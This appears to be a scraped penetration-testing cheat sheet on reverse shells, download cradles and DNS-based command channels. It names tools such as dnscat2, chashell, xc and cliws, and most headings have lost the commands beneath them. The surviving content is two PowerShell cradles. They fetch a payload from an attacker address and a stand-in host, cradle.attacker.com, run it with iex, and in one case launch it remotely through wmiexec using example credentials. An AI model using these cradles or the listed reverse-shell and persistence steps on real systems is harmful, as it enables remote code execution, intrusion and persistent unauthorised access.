Reverse Shells

PowerShell

Download Cradles

PowerShell DNS Delivery

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'

wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'

Transport over DNS

dnscat2

chashell

Buy and configure DNS (e. g., example.com):

Get dependencies:

Clone chashell into $GOPATH/src (otherwise, dep will error out):

Build binaries:

Run server on Attacker:

Run client on Victim:

Tools

VbRev

xc

Listen:

Launch:

cliws

Reverse mode:

Create a scheduled task for persistence:

Last updated